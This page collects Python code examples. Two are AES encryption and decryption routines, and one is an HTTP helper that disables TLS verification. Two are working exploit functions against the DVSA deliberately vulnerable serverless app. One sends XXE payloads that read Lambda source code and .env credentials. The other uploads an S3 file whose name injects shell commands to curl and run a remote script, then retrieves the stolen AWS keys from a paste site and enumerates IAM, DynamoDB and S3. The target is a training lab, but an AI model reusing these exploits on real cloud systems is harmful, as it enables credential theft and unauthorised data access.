Beispiel #1
0
def inv_cipher(data, key, N_k):

    r = 0
    rounds = get_rounds(N_k)

    data = create_state_block(data)
    logger.input(r, data)

    key_sch = key[-4:]
    logger.k_sch(r, key_sch)

    addRoundKey(data, key_sch)

    for r in range(rounds-2, 0, -1):
        logger.start(rounds-r-1, data)

        inv_shiftRows(data)
        logger.shift_row(rounds-r-1, data)

        inv_subBytes(data)
        logger.sub_byte(rounds-r-1, data)

        key_sch = key[4*(r):4*(r+1)]
        logger.k_sch(rounds-r-1, key_sch)

        addRoundKey(data, key_sch)
        logger.ik_add(rounds-r-1, data)

        inv_mixColumns(data)
    logger.start(rounds-r, data)

    inv_subBytes(data)
    logger.sub_byte(rounds-r, data)

    inv_shiftRows(data)
    logger.shift_row(rounds-r, data)

    key_sch = key[0:4]
    logger.k_sch(rounds-r, key_sch)

    addRoundKey(data, key_sch)
    logger.output(rounds-r, data)

    return convert_block_to_stream(data)
Beispiel #2
0
def cipher(data, key, N_k):

    r = 0
    rounds = get_rounds(N_k)

    data = create_state_block(data)
    logger.input(r, data)

    key_sch = key[0:4]
    logger.k_sch(r, key_sch)

    addRoundKey(data, key_sch)
    for r in range(1, rounds - 1):
        logger.start(r, data)

        subBytes(data)
        logger.sub_byte(r, data)

        shiftRows(data)
        logger.shift_row(r, data)

        mixColumns(data)
        logger.mix_column(r, data)

        key_sch = key[4 * r:4 * (r + 1)]
        logger.k_sch(r, key_sch)

        addRoundKey(data, key_sch)
    r += 1
    logger.start(r, data)

    subBytes(data)
    logger.sub_byte(r, data)

    shiftRows(data)
    logger.shift_row(r, data)

    key_sch = key[-4:]
    logger.k_sch(r, key_sch)

    addRoundKey(data, key_sch)
    logger.output(r, data)

    return convert_block_to_stream(data)
Beispiel #3
0
def xploit_xxe():
    xxe_ok_request = '<?xml version="1.0"?><movie>Harry Potter</movie>'
    xxe_steal_source = '<?xml version="1.0"?><!DOCTYPE test [ <!ENTITY test SYSTEM "/var/task/handler.py">]><movie>&test;</movie>'
    xxe_steal_env = '<?xml version="1.0"?><!DOCTYPE test [ <!ENTITY test SYSTEM ".env">]><movie>&test;</movie>'
    xxe_endpoint_err = "Could not find movies with:"
    aws_output_file = utils.LOCAL_FOLDER + ".awsoutput"
    aws_cli_err = "An error occurred (AccessDenied) when calling the ListUsers operation: User: movies-db-user is not authorized to perform: {}:{}"

    profile = utils.getProfile()
    if "endpoint" in profile and profile["endpoint"] is not None:
        endpoint = profile["endpoint"]
    else:
        endpoint = logger.input("Please insert the XXE-vulnerable Lambda's endpoint > ")
        profile["endpoint"] = endpoint
        utils.updateProfile(profile)
        with open(utils.LOCAL_FOLDER + ".endpoint", "w+") as f:
            f.write(endpoint)

    logger.info("Using endpoint: " + endpoint)
    header = {'content-type': 'application/xml'}
    response = utils.ApiCall(endpoint, "POST", xxe_ok_request, header)
    try:
        res = json.loads(response)
    except:
        res = response

    if "status" in res and res["status"] == "ok":
        logger.alert("Got answer from endpoint. Trying exploits...")
        logger.info("[!] Trying to steal source code")
        data = xxe_steal_source
        response = utils.ApiCall(endpoint, "POST", data, header)
        try:
            res = json.loads(response)
        except:
            res = response

        if "status" in res and res["status"] == "err" and "result" in res and res["result"].find(xxe_endpoint_err) > -1 and res["result"].find("import") > -1:
            logger.alert("Lambda source code obtained! Parsing code...")
            for i in range(0, 5):
                sys.stdout.write(".")
                time.sleep(0.5)
                sys.stdout.flush()
            logger.info(". [!] Additional file(s) identified. Trying to steal.")
            data= xxe_steal_env
            response = utils.ApiCall(endpoint, "POST", data, header)
            try:
                res = json.loads(response)
            except:
                res = response
            if "status" in res and res["status"] == "err" and "result" in res and res["result"].find(xxe_endpoint_err) > -1 and res["result"].find("aws_access_key_id") > -1:
                logger.pwned()
                raw_keys = res["result"].replace(xxe_endpoint_err, "").rstrip()
                keys = json.loads(raw_keys)
                logger.alert("[!] AWS keys obtained! Trying to access other resources...")
                os.environ["AWS_ACCESS_KEY_ID"] = keys['aws_access_key_id']
                os.environ["AWS_SECRET_ACCESS_KEY"] = keys["aws_secret_access_key"]

                logger.info("[X] Trying IAM")
                service = "iam"
                action = "list-roles"
                cmd = ""
                utils.run_aws_cmd(service, action, cmd)

                logger.info("[X] Trying DynamoDB")
                service = "dynamodb"
                action = "list-tables"
                cmd = ""
                utils.run_aws_cmd(service, action, cmd)

                logger.info("[X] Trying S3")
                service = "s3"
                action = "ls"
                cmd = ""
                utils.run_aws_cmd(service, action, cmd)
                if os.path.isfile(aws_output_file) and not os.stat(aws_output_file).st_size == 0:
                    with open(aws_output_file, "r") as f:
                        output = f.readlines()
                        list_buckets = []
                    for line in output:
                        logger.alert(line.rstrip())
                        list_buckets.append(line[20:].rstrip())

                logger.info("[X] Trying to access buckets(s)")
                service = "s3api"
                action = "list-objects-v2"
                for bucket in list_buckets:
                    cmd = "--bucket {}".format(bucket)
                    utils.run_aws_cmd(service, action, cmd)
                    if os.path.isfile(aws_output_file) and not os.stat(aws_output_file).st_size == 0:
                        with open(aws_output_file, "r") as f:
                            logger.info(f.read())
                raw_input()
        else:
            logger.error("XXE exploit did not work!")
    else:
        logger.error("Invalid response. Please check endpoint and try again.")

    raw_input()
    return
Beispiel #4
0
def xploit_injection():
    profile = utils.getProfile()
    aws_output_file = utils.LOCAL_FOLDER + ".awsoutput"
    if "account" in profile and profile["account"] is not None:
        account = profile["account"]
    else:
        account = logger.input("Please insert the AWS Account ID on which DVSA is installed > ")
        profile["account"] = account
        utils.updateProfile(profile)
        with open(utils.LOCAL_FOLDER + ".account", "w+") as f:
            f.write(account)

    logger.debug("generating random url")
    rand = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8))
    url = "https://cl1p.net/dvsa-s3-attack-" + str(rand)
    logger.debug(url)
    logger.debug("getting page hash")
    pageHash = utils.ApiCall(url, "GET", None, None)
    if pageHash.find("pageHash") == -1:
        pageHash = utils.ApiCall(url, "GET", None, None)

    pgh = pageHash.split("pageHash")[1][9:73]
    sqh = pageHash.split("seqHash")[1][9:73]
    logger.debug(pgh)
    logger.debug(sqh)
    logger.info("creating malicious files name")
    fname = "_;cd ..;cd ..;cd tmp;echo {}>r;echo {}>p;echo {}>s;curl xza.s3-website-us-east-1.amazonaws.com>x;sh x;ls x.raw".format(rand, pgh, sqh)
    logger.debug(fname)
    logger.info("uploading malicious file to s3 bucket")

    bucket = "dvsa-receipts-bucket-{}".format(account)
    if profile["proxy"] is not None:
        proxy = {'http': profile["proxy"], 'https': profile["proxy"]}
    else:
        proxy = {}

    s3 = boto3.client('s3', config=Config(proxies=proxy), verify=False)

    s3.upload_file('/dev/null', bucket, '2020/20/20/{}'.format(fname), ExtraArgs={'ACL': 'public-read'})

    logger.info("Malicious file was uploaded successfully.")
    logger.debug("Uploaded to bucket: " + bucket + ", path: 2020/20/20/")
    logger.info("Waiting for remote account to execute the malicious payload ")
    for i in range(5):
        sys.stdout.write('.')
        sys.stdout.flush()
        time.sleep(1)
    print("\n")

    logger.info("fetching keys from: {}  (link will no longer be accessible)".format(url))
    res = utils.ApiCall(url, "GET", None, None)
    locs = res.find('<textarea name="content">')
    if locs == -1:
        logger.error("something went wrong.")
        sys.exit(3)
    else:
        loce = res.find('</textarea>')
        content = res[locs + 25:loce]

    rawkeys = base64.b64decode(content)
    logger.pwned()
    logger.alert(rawkeys)
    if rawkeys.find("AWS_SESSION_TOKEN") != -1 and rawkeys.find("AWS_ACCESS_KEY_ID") != -1:
        for line in rawkeys.split('\n'):
            if line.upper().startswith("AWS_SESSION_TOKEN="):
                os.environ["AWS_SESSION_TOKEN"] = line[18:].rstrip()
            elif line.upper().startswith("AWS_ACCESS_KEY_ID="):
                os.environ["AWS_ACCESS_KEY_ID"] = line[18:].rstrip()
            elif line.upper().startswith("AWS_SECRET_ACCESS_KEY="):
                os.environ["AWS_SECRET_ACCESS_KEY"] = line[22:].rstrip()
            else:
                pass

        logger.pwned()
        logger.alert("Got remote lambda keys! Trying access to other resource...")

        logger.info("[X] Who am I? (caller-identity)")
        service = "sts"
        action = "get-caller-identity"
        cmd = ""
        utils.run_aws_cmd(service, action, cmd)
        if os.path.isfile(aws_output_file) and not os.stat(aws_output_file).st_size == 0:
            with open(aws_output_file, "r") as f:
                output = f.readlines()
            logger.info(''.join(output))

        for line in output:
            if line.find("Arn") > -1:
                rolename = line.rstrip().replace("|", "").split("/")[1]

        logger.info("[X] Trying IAM")
        service = "iam"
        action = "get-role"
        cmd = "--role-name {}".format(rolename)
        utils.run_aws_cmd(service, action, cmd)

        logger.info("[X] Trying DynamoDB")
        service = "dynamodb"
        action = "list-tables"
        cmd = ""
        utils.run_aws_cmd(service, action, cmd)
        if os.path.isfile(aws_output_file) and not os.stat(aws_output_file).st_size == 0:
            with open(aws_output_file, "r") as f:
                output = f.readlines()
            logger.info(''.join(output))

        logger.info("[X] Trying to access table(s)")
        tables_list = []
        for line in output:
            line = line.replace("|", "").replace("+", "").replace(" ListTables ", "").replace(" TableNames ", "").replace(" ", "").rstrip()
            if len(line) > 3 and line.find("----") == -1:
                tables_list.append(line)
        action = "scan"
        for table in tables_list:
            if table.startswith("DVSA"):
                cmd = "--table {}".format(table)
                utils.run_aws_cmd(service, action, cmd, "text")
                if os.path.isfile(aws_output_file) and not os.stat(aws_output_file).st_size == 0:
                    with open(aws_output_file, "r") as f:
                        logger.info(f.read())

        raw_input()
        return True
    else:
        logger.error("Sorry, could not obtain keys.")
        logger.pressAnyKey()
        raw_input()
        return False
Beispiel #5
0
def ApiCall(url, method, data, head):
    requests.packages.urllib3.disable_warnings()
    if url is None or not url.startswith("http"):
        logger.error("invalid URL")
        yn = logger.input("Change URL? [y/N] > ")
        if yn == 'y' or yn == "Y":
            url = logger.input("Enter endpoint URL > ")
            updateProfileAttr("endpoint", url)
            with open(LOCAL_FOLDER + ".endpoint", "w+") as f:
                f.write(url)
        else:
            return

    res = None
    if head is not None:
        if "content-type" in head or "Content-Type" in head:
            headers = head
        else:
            head = json.dumps(head)
            headers = '{"content-type": "application/json", ' + head[1:]
            headers = json.loads(headers)
    else:
        headers = {'content-type': 'application/json'}

    logger.debug("Sending requests to: " + url)
    if method == "POST":
        data = data
        logger.debug("Request Payload: " + str(data))
        try:
            if getProfile()["proxy"] is not None:
                proxies = { 'http': "http://" + getProfile()["proxy"], 'https': "http://" + getProfile()["proxy"] }
                res = requests.post(url, data=data, headers=headers, proxies=proxies, verify=False)
            else:
                res = requests.post(url, data=data, headers=headers)

        except urllib2.HTTPError as e:
            logger.debug("RESPONSE: " + str(e))
            return '{"status": "err"}'

        except ValueError as e:
            if str(e).startswith("Invalid header value"):
                logger.error("Invalid session. Please, re-authenticate")
                updateProfileAttr("isAuth", False)
                updateProfileAttr("session", None)
                logger.pressAnyKey()
                return '{"status": "err"}'

    else:
        proxies = None
        if getProfile()["proxy"] is not None:
            # req.add_header('Host', '127.0.0.1')
            proxies = {'http': "http://" + getProfile()["proxy"], 'https': "http://" + getProfile()["proxy"]}
        try:
            res = requests.get(url, headers=headers, proxies=proxies, verify=False)

        except urllib2.HTTPError as e:
            logger.debug ("RESPONSE: " + str(e))
            return '{"status": "err"}'

        except ValueError as e:
            if str(e).startswith("Invalid header value"):
                logger.error("Invalid session. Please, re-authenticate")
                updateProfileAttr("isAuth", False)
                updateProfileAttr("session", None)
                logger.pressAnyKey()
                return '{"status": "err"}'
    if len(res.content) > 64000:
        logger.debug("Response is too big")
    else:
        logger.debug("RESPONSE: " + res.content.encode('utf-8').strip())

    return res.content